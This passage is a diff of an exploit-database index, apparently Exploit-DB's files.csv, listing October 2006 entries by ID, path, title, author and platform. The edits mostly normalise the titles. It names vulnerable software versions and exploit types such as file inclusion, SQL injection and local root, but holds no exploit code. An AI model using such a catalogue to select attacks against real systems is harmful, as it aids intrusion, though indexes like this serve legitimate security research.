4.4 - Remote File Include Vulnerabilities",2006-10-16,Matdhule,php,webapps,0 -2571,platforms/windows/dos/2571.pl,"Xfire <= 1.6.4 - Remote Denial of Service Exploit (Perl)",2006-10-16,n00b,windows,dos,0 -2572,platforms/php/webapps/2572.txt,"Osprey <= 1.0 GetRecord.php Remote File Include",2006-10-16,Kw3[R]Ln,php,webapps,0 +2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion Vulnerabilities",2006-10-16,Matdhule,php,webapps,0 +2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service Exploit (Perl)",2006-10-16,n00b,windows,dos,0 +2572,platforms/php/webapps/2572.txt,"Osprey 1.0 GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 adminfoot.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 -2574,platforms/php/webapps/2574.php,"Simplog <= 0.9.3.1 comments.php Remote SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 -2575,platforms/php/webapps/2575.php,"Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 -2576,platforms/php/webapps/2576.txt,"Specimen Image Database (client.php) Remote File Include",2006-10-16,Kw3[R]Ln,php,webapps,0 -2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 - Remote File Include",2006-10-16,vegas78,php,webapps,0 -2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 - (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 -2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book <= 1.1.2 - Remote SQL Injection Exploit PoC",2006-10-16,ShAnKaR,php,webapps,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase <= 9.1.5 - (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 -2581,platforms/linux/local/2581.c,"NVIDIA Graphics Driver <= 8774 - Local Buffer Overflow Exploit",2006-10-16,"Rapid7 Security",linux,local,0 -2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Include",2006-10-17,nuffsaid,php,webapps,0 -2583,platforms/php/webapps/2583.php,"WSN Forum <= 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 -2584,platforms/php/webapps/2584.pl,"PHPRecipeBook <= 2.35 - (g_rb_basedir) Remote File Include Exploit",2006-10-17,r0ut3r,php,webapps,0 -2585,platforms/php/webapps/2585.txt,"PHPmybibli <= 3.0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-17,the_day,php,webapps,0 -2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 -2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 - (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 -2588,platforms/php/webapps/2588.txt,"Easynews <= 4.4.1 - (admin.php) Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 -2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 - (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 +2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 comments.php SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2576,platforms/php/webapps/2576.txt,"Specimen Image Database (client.php) Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 +2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 +2578,platforms/php/webapps/2578.txt,"phpMyManga 0.8.1 - (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 +2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection Exploit PoC",2006-10-16,ShAnKaR,php,webapps,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 - (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 +2581,platforms/linux/local/2581.c,"NVIDIA Graphics Driver 8774 - Local Buffer Overflow Exploit",2006-10-16,"Rapid7 Security",linux,local,0 +2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 +2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 +2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - (g_rb_basedir) Remote File Inclusion Exploit",2006-10-17,r0ut3r,php,webapps,0 +2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-17,the_day,php,webapps,0 +2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 +2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 +2588,platforms/php/webapps/2588.txt,"Easynews 4.4.1 - (admin.php) Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 +2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - (renderer) Multiple Remote File Inclusion Vulnerabilities",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 - (txt.inc.php) Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 -2591,platforms/php/webapps/2591.txt,"Php AMX 0.90 - (plugins/main.php) Remote File Include",2006-10-18,MP,php,webapps,0 -2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board <= 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 -2593,platforms/php/webapps/2593.php,"PHP-Post <= 1.01 - (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 -2594,platforms/php/webapps/2594.php,"YapBB <= 1.2 Beta2 - (yapbb_session.php) Remote File Include Exploit",2006-10-18,Kacper,php,webapps,0 -2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - (lcUser.php) Remote File Include",2006-10-18,o0xxdark0o,php,webapps,0 -2596,platforms/php/webapps/2596.pl,"EPNadmin <= 0.7 - (constantes.inc.php) Remote File Include Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 -2597,platforms/multiple/dos/2597.pl,"Asterisk <= 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 -2598,platforms/php/webapps/2598.php,"PH Pexplorer <= 0.24 - (explorer_load_lang.php) Local Include Exploit",2006-10-19,Kacper,php,webapps,0 -2599,platforms/php/webapps/2599.txt,"pandaBB (displayCategory) Remote File Include Vulnerabilities",2006-10-19,nukedclx,php,webapps,0 -2600,platforms/php/webapps/2600.txt,"Segue CMS <= 1.5.8 - (themesdir) Remote File Include",2006-10-19,nuffsaid,php,webapps,0 +2591,platforms/php/webapps/2591.txt,"Php AMX 0.90 - (plugins/main.php) Remote File Inclusion",2006-10-18,MP,php,webapps,0 +2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 +2593,platforms/php/webapps/2593.php,"PHP-Post 1.01 - (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 +2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - (yapbb_session.php) Remote File Inclusion Exploit",2006-10-18,Kacper,php,webapps,0 +2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - (lcUser.php) Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps,0 +2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - (constantes.inc.php) Remote File Inclusion Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 +2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 +2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion Exploit",2006-10-19,Kacper,php,webapps,0 +2599,platforms/php/webapps/2599.txt,"pandaBB (displayCategory) Remote File Inclusion Vulnerabilities",2006-10-19,nukedclx,php,webapps,0 +2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow Exploit",2006-10-19,"Greg Linares",windows,remote,25 -2602,platforms/php/webapps/2602.txt,"Power Phlogger <= 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 -2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Include",2006-10-20,MP,php,webapps,0 -2604,platforms/php/webapps/2604.txt,"WGCC <= 0.5.6b (quiz.php) Remote SQL Injection",2006-10-20,ajann,php,webapps,0 -2605,platforms/php/webapps/2605.txt,"RSSonate (xml2rss.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 -2606,platforms/php/webapps/2606.txt,"CASTOR <= 1.1.1 - (lib/rs.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 -2607,platforms/php/webapps/2607.txt,"kawf <= 1.0 - (main.php) Remote File Include",2006-10-21,o0xxdark0o,php,webapps,0 -2608,platforms/php/webapps/2608.txt,"Virtual Law Office (phpc_root_path) Remote File Include Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 -2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application Remote File Include Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 -2611,platforms/php/webapps/2611.txt,"Trawler Web CMS <= 1.8.1 - Multiple Remote File Include Vulnerabilities",2006-10-21,k1tk4t,php,webapps,0 -2612,platforms/php/webapps/2612.txt,"PGOSD (misc/function.php3) Remote File Include",2006-10-22,"Mehmet Ince",php,webapps,0 -2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module <= 1.8.1 - Remote Include",2006-10-22,h4ntu,php,webapps,0 -2614,platforms/php/webapps/2614.txt,"Net_DNS <= 0.3 - (DNS/RR.php) Remote File Include",2006-10-22,Drago84,php,webapps,0 -2615,platforms/php/webapps/2615.txt,"SpeedBerg <= 1.2beta1 - (SPEEDBERG_PATH) File Include Vulnerabilities",2006-10-22,k1tk4t,php,webapps,0 -2616,platforms/php/webapps/2616.php,"JaxUltraBB <= 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 -2617,platforms/php/webapps/2617.php,"PHP-Nuke <= 7.9 - (Encyclopedia) Remote SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 -2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - (common.php) Remote File Include",2006-10-22,"the master",php,webapps,0 -2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB <= 2021.4.40 - Multiple File Include Vulnerabilities",2006-10-23,020,php,webapps,0 -2622,platforms/php/webapps/2622.txt,"OTSCMS <= 2.1.3 - Multiple Remote File Include Vulnerabilities",2006-10-23,GregStar,php,webapps,0 -2623,platforms/php/webapps/2623.pl,"SourceForge <= 1.0.4 - (database.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 -2624,platforms/php/webapps/2624.txt,"WiClear <= 0.10 - (path) Remote File Include Vulnerabilities",2006-10-23,"the master",php,webapps,0 -2625,platforms/windows/dos/2625.c,"QK SMTP <= 3.01 - (RCPT TO) Remote Denial of Service Exploit",2006-10-23,"Greg Linares",windows,dos,0 -2626,platforms/php/webapps/2626.txt,"MDweb <= 1.3 - (chemin_appli) Remote File Include Vulnerabilities",2006-10-23,Drago84,php,webapps,0 -2627,platforms/php/webapps/2627.txt,"Jaws <= 0.5.2 - (include/JawsDB.php) Remote File Include",2006-10-23,Drago84,php,webapps,0 -2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 +2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0 +2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0 +2605,platforms/php/webapps/2605.txt,"RSSonate (xml2rss.php) Remote File Inclusion Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 +2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - (lib/rs.php) Remote File Inclusion Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 +2607,platforms/php/webapps/2607.txt,"kawf 1.0 - (main.php) Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0 +2608,platforms/php/webapps/2608.txt,"Virtual Law Office (phpc_root_path) Remote File Inclusion Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 +2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application Remote File Inclusion Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 +2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-21,k1tk4t,php,webapps,0 +2612,platforms/php/webapps/2612.txt,"PGOSD (misc/function.php3) Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 +2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module 1.8.1 - Remote Include",2006-10-22,h4ntu,php,webapps,0 +2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 +2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Include Vulnerabilities",2006-10-22,k1tk4t,php,webapps,0 +2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 +2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 +2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - (common.php) Remote File Inclusion",2006-10-22,"the master",php,webapps,0 +2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Include Vulnerabilities",2006-10-23,020,php,webapps,0 +2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusion Vulnerabilities",2006-10-23,GregStar,php,webapps,0 +2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - (database.php) Remote File Inclusion Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 +2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion Vulnerabilities",2006-10-23,"the master",php,webapps,0 +2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service Exploit",2006-10-23,"Greg Linares",windows,dos,0 +2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion Vulnerabilities",2006-10-23,Drago84,php,webapps,0 +2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - (include/JawsDB.php) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 +2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer (ADODB Execute) Denial of Service PoC",2006-10-24,"YAG KOHHA",windows,dos,0 -2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 -2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 -2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 - (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 +2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 +2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 +2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion Exploit",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - (swask) Format String Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment variable) Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 -2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator <= 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 +2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit",2006-10-24,"Evgeny Legerov",bsd,dos,0 -2640,platforms/php/webapps/2640.txt,"UeberProject <= 1.0 - (login/secure.php) Remote File Include",2006-10-24,"Mehmet Ince",php,webapps,0 +2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - constructor Local Root Exploit",2006-10-24,"Marco Ivaldi",solaris,local,0 -2642,platforms/asp/webapps/2642.asp,"Berty Forum <= 1.4 - (index.php) Remote Blind SQL Injection Exploit",2006-10-24,ajann,asp,webapps,0 -2643,platforms/php/webapps/2643.php,"JaxUltraBB <= 2.0 Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 +2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - (index.php) Remote Blind SQL Injection Exploit",2006-10-24,ajann,asp,webapps,0 +2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 Topic Reply Command Execution Exploit",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit",2006-10-25,rgod,php,webapps,0 -2645,platforms/php/webapps/2645.txt,"ArticleBeach Script <= 2.0 - (index.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2646,platforms/php/webapps/2646.txt,"TextPattern <= 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2647,platforms/php/webapps/2647.php,"Imageview <= 5 - (Cookie/index.php) Remote Local Include Exploit",2006-10-25,Kacper,php,webapps,0 -2648,platforms/php/webapps/2648.txt,"CommentIT (PathToComment) Remote File Include Vulnerabilities",2006-10-25,"Cold Zero",php,webapps,0 -2649,platforms/windows/remote/2649.c,"QK SMTP <= 3.01 - (RCPT TO) Remote Buffer Overflow Exploit",2006-10-25,Expanders,windows,remote,25 +2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - (index.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 +2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 +2647,platforms/php/webapps/2647.php,"Imageview 5 - (Cookie/index.php) Remote/Local File Inclusion Exploit",2006-10-25,Kacper,php,webapps,0 +2648,platforms/php/webapps/2648.txt,"CommentIT (PathToComment) Remote File Inclusion Vulnerabilities",2006-10-25,"Cold Zero",php,webapps,0 +2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow Exploit",2006-10-25,Expanders,windows,remote,25 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service Exploit",2006-10-25,"Greg Linares",windows,dos,0 2651,platforms/windows/remote/2651.c,"MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0 -2652,platforms/php/webapps/2652.htm,"Php League <= 0.81 - (config.php) Remote File Include Exploit",2006-10-25,ajann,php,webapps,0 -2653,platforms/php/webapps/2653.txt,"MPCS <= 1.0 - (path) Remote File Include Vulnerabilities",2006-10-26,v1per-haCker,php,webapps,0 -2654,platforms/php/webapps/2654.txt,"ask_rave <= 0.9 PR (end.php footfile) Remote File Include",2006-10-26,v1per-haCker,php,webapps,0 -2655,platforms/php/webapps/2655.php,"miniBB <= 2.0.2 - (bb_func_txt.php) Remote File Include Exploit",2006-10-26,Kacper,php,webapps,0 -2656,platforms/php/webapps/2656.txt,"MiniBill <= 20061010 - (menu_builder.php) File Include",2006-10-26,"Mehmet Ince",php,webapps,0 +2652,platforms/php/webapps/2652.htm,"Php League 0.81 - (config.php) Remote File Inclusion Exploit",2006-10-25,ajann,php,webapps,0 +2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion Vulnerabilities",2006-10-26,v1per-haCker,php,webapps,0 +2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 +2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion Exploit",2006-10-26,Kacper,php,webapps,0 +2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - (menu_builder.php) File Include",2006-10-26,"Mehmet Ince",php,webapps,0 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 Popup Address Bar Spoofing Weakness",2006-10-26,anonymous,windows,remote,0 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0 -2659,platforms/php/webapps/2659.php,"N/X WCMS <= 4.1 - (nxheader.inc.php) Remote File Include Exploit",2006-10-27,Kacper,php,webapps,0 -2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - Remote SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 -2661,platforms/asp/webapps/2661.asp,"Php League 0.82 - (classement.php) Remote SQL Injection Exploit",2006-10-27,ajann,asp,webapps,0 -2662,platforms/asp/webapps/2662.txt,"Hosting Controller <= 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0 -2663,platforms/php/webapps/2663.txt,"PhpShop Core <= 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0 -2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local Include Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 -2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Include",2006-10-28,"Mehmet Ince",php,webapps,0 -2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Include",2006-10-28,"Mehmet Ince",php,webapps,0 +2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion Exploit",2006-10-27,Kacper,php,webapps,0 +2660,platforms/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,php,webapps,0 +2661,platforms/asp/webapps/2661.asp,"Php League 0.82 - (classement.php) SQL Injection Exploit",2006-10-27,ajann,asp,webapps,0 +2662,platforms/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Remote Unauthenticated Vulnerabilities",2006-10-27,"Soroush Dalili",asp,webapps,0 +2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - (PS_BASE) File Include Vulnerabilities",2006-10-28,"Cold Zero",php,webapps,0 +2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0beta (viewticket.php) Local File Inclusion Exploit",2006-10-28,Kw3[R]Ln,php,webapps,0 +2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - (upgrade.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 +2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - (Core/core.inc.php) Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include",2006-10-28,"Mehmet Ince",php,webapps,0 -2668,platforms/php/webapps/2668.htm,"MiraksGalerie <= 2.62 - (pcltar.lib.php) Remote File Include Exploit",2006-10-28,ajann,php,webapps,0 -2669,platforms/php/webapps/2669.php,"Free Image Hosting <= 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 -2670,platforms/php/webapps/2670.php,"Free File Hosting <= 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 +2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - (pcltar.lib.php) Remote File Inclusion Exploit",2006-10-28,ajann,php,webapps,0 +2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 +2670,platforms/php/webapps/2670.php,"Free File Hosting 1.1 - (forgot_pass.php) File Include Exploit",2006-10-28,Kacper,php,webapps,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit",2006-10-28,FistFuXXer,windows,remote,8028 2672,platforms/windows/dos/2672.py,"Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit",2006-10-28,h07,windows,dos,0 2673,platforms/php/webapps/2673.txt,"Simple Website Software 0.99 - (common.php) File Include",2006-10-29,"Mehmet Ince",php,webapps,0 -2674,platforms/php/webapps/2674.php,"MySource CMS <= 2.16.2 - (init_mysource.php) Remote File Include Exploit",2006-10-29,Kacper,php,webapps,0 -2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - (index.php) Remote SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 +2674,platforms/php/webapps/2674.php,"MySource CMS 2.16.2 - (init_mysource.php) Remote File Inclusion Exploit",2006-10-29,Kacper,php,webapps,0 +2675,platforms/php/webapps/2675.asp,"PHPEasyData Pro 2.2.2 - (index.php) SQL Injection Exploit",2006-10-29,ajann,php,webapps,0 2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit",2006-10-29,Nanika,windows,local,0 2677,platforms/php/webapps/2677.asp,"Netref 4 - (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 -2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Include",2006-10-29,v1per-haCker,php,webapps,0 -2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 - (cherche.php) Remote SQL Injection",2006-10-29,ajann,php,webapps,0 +2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0 +2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - (cherche.php) SQL Injection",2006-10-29,ajann,php,webapps,0 2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 -2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 +2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 -2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 -2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 +2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) SQL Injection",2006-10-30,ajann,asp,webapps,0 +2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL 